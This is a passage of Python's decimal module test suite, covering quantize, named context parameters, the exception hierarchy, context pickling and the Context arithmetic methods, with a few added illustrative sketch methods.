context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
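    # A minimal illustrative sketch (not collected by unittest): quantize
    # rounds to the exponent of its argument -- the usual tool for fixing
    # a number of decimal places.
    def _sketch_quantize(self):
        from decimal import Decimal, ROUND_DOWN
        cents = Decimal('0.01')
        assert Decimal('7.335').quantize(cents) == Decimal('7.34')
        assert (Decimal('7.335').quantize(cents, rounding=ROUND_DOWN)
                == Decimal('7.33'))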
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
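    # A minimal illustrative sketch (not collected by unittest): the
    # signals are ordinary exception classes, so a single handler can
    # catch any decimal error, and DivisionByZero also satisfies the
    # builtin ZeroDivisionError.
    def _sketch_exception_hierarchy(self):
        import decimal
        try:
            decimal.Decimal(1) / decimal.Decimal(0)
        except decimal.DecimalException as exc:
            assert isinstance(exc, decimal.DivisionByZero)
            assert isinstance(exc, ZeroDivisionError)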
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
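    # A minimal illustrative sketch (not collected by unittest): fma
    # rounds only once, so at low precision it can differ from the
    # separately rounded multiply-then-add.
    def _sketch_fma(self):
        from decimal import Decimal, localcontext
        with localcontext() as ctx:
            ctx.prec = 3
            a, b, c = Decimal(111), Decimal(12), Decimal(4)
            assert a.fma(b, c) == Decimal('1.34E+3')  # 1332 + 4, one rounding
            assert a * b + c == Decimal('1.33E+3')    # product rounded first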
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
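    # A minimal illustrative sketch (not collected by unittest): the
    # three-argument form computes an exact modular power for integral
    # operands, mirroring the built-in pow().
    def _sketch_power_modulo(self):
        from decimal import Context, Decimal
        assert Context().power(Decimal(2), Decimal(8), Decimal(5)) == 1
        assert pow(Decimal(2), Decimal(8), Decimal(5)) == 1   # 256 % 5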
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
